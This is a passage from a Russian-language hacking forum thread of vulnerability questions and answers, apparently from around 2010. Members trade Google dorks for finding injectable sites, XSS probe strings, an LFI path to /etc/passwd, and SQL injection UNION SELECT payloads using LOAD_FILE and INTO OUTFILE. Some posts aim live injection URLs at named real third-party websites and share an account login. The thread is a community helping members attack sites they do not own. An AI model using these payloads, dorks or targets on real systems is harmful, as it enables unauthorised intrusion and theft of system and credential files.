Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163
    google.ru => inurl:.php?id=453 inurl:.net
     
  2. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    спасибо :) а почему именно 453 ?
     
    1 person likes this.
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    если надо просто найти скули то уже сказали в гугле ищи, но если надо найти на определенном сайте тогда придется везде на пост и гейт запросы поставит " ' +1=1 or+1=1 и тд. Прочитай статьи на этом форуме много узнаеш.
    Всё на софт поставит не рекомендую потому что иногда часто они пропускают нужные данные, тем более чтоб на софт кормит нужно найти и потом анализировать а уж потом поставит на правильный запрос.

    Рекомендуемые софты есть на этом форуме и на exploit.in

    --Sipt4 от от уважаемого SQLHack
    --Toolza1 от уважаемого Pashkela
    --Reiluke tools 2,7 от reiluke
    -- и новый Havij 1.07 от r3dm0v3

    эти софты впольне хватет для начала.

    Лучше ручками потренируйся а потом для дампа юзаеш софты.

    PS. Я сам все ещё учусь на ошибках

    453 не обязательно можеш искать

    google.ru => inurl:.php?id= inurl:.net
     
  4. Paul_Eckman

    Paul_Eckman Member

    Joined:
    10 Nov 2009
    Messages:
    55
    Likes Received:
    65
    Reputations:
    10
    Как вручную искать xss на сайтах, где нет форм для ввода?
     
  5. m0Hze

    m0Hze Elder - Старейшина

    Joined:
    1 Nov 2008
    Messages:
    267
    Likes Received:
    644
    Reputations:
    208
    Подставлять во все видимые и невидимые переменные,нужный код,ну обычно "><script>alert()</script>, POST,GET,FILES,COOKIES, во все все которые пердаються скрипту,возможно так что то найдешь :)
     
    2 people like this.
  6. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    Paul_Eckman, смотри где введеные ГЕТ переменные отображаются на странице
     
  7. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    такая конструкция ограничивает файлы которые можно прочитать?
    я правильно понимаю?...
    include_once($config['path_src_include'] . "common.inc.php");
    include_once($config['path_src_include'] . "check_html.inc.php");
     
  8. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    подскажите плз, нашел сайт, при вводе ?id=1' появляется ошибка You have ...а не меняется, подскажите что я не так делаю?
     
  9. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    а от lfi типа ../etc/passwd%00
     
  10. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
     
  11. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    да не, я и с комментариями и без пробовал, не меняется ((
     
  12. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
     
  13. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
     
    #10993 547, 8 Jan 2010
    Last edited: 8 Jan 2010
  14. Paul_Eckman

    Paul_Eckman Member

    Joined:
    10 Nov 2009
    Messages:
    55
    Likes Received:
    65
    Reputations:
    10
    Code:
    http://rozetka.com.ua/index.php?search_text=%2522%253E%253Cscript%253Ealert%2528%2529%253C%252Fscript%253E&page=search&lang=ru&imageField.x=0&imageField.y=0
    [/code] (пассивная)

    Какая-то странная реакция.. :) После 2 алертов открывается доп. активное окно поиска и высвечивается кусок кода " class="sinp" />. Что это значит? :)))
     
  15. Gidz

    Gidz New Member

    Joined:
    10 Aug 2009
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0
    не так тоже не как, ну да ладно, я пробую на новом хосте, там вроде все работает, узнал количество полей, пробую
    -1+UNION+SELECT+LOAD_FILE(etc/passwd);
    но мне выдается такая ошибка
    Unknown column 'etc' in 'field list'
    пробую на запись проверить, но пишет не правильный синтаксис
    -1+UNION+SELECT+1+INTO+OUTFILE+'/tmp/file.php';
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'/tmp/file.php\'' at line 1

    кавычки может ему не нравятся?? без них если написать, то тоже самое, только без слешей '/tmp/file.php'
    подскажите нубу плз, что можно попробовать еще?? :confused:
     
  16. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    733
    Likes Received:
    646
    Reputations:
    251
    В кавычках дело, а без кавычек нельзя.
     
    #10996 Ctacok, 8 Jan 2010
    Last edited: 8 Jan 2010
    1 person likes this.
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    942
    Likes Received:
    428
    Reputations:
    139
    2Gidz, при меджик квотес у тебя инто оутфайл/дампфайл работать не будет.
    По поводу лоад файл:
    1) -1+UNION+SELECT+LOAD_FILE(etc/passwd); <------ Это не верно, нужны кавычки:
    -1+UNION+SELECT+LOAD_FILE('/etc/passwd');
    А так как у тебя меджик квотес - нужно хэксить, или чарить:
    -1+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764);

    Что бы не было дальнейших вопросов - скажу, что в инот оутфайл/дампфайл путь хексить/чарить НЕЛЬЗЯ.
     
    1 person likes this.
  18. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    не выводятся принтабельный столобец, перепробовал все....

    Code:
    http://lanpolis.ru/private/?act1=cat&s=NDg1MTFANDg5VkgwOGhnczVQSQ==&cid=-5+and+1=2+union+select+1,2,3,4,5--
    П.С. Запрос из личного кабинета, паблег акк: admin;admin
    П.П.С. можно в личку
     
  19. RAINUR2

    RAINUR2 New Member

    Joined:
    27 Aug 2009
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    Кто научит Sql injection? Уже и уязвимый скрипт написал ,но ни как не получается. Пожалуйста помогите дураку.:) юин 3355805
     
  20. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    358
    Likes Received:
    313
    Reputations:
    163

    Как вариант попробуй найти скулю на сайте..
     
Loading...
Thread Status:
Not open for further replies.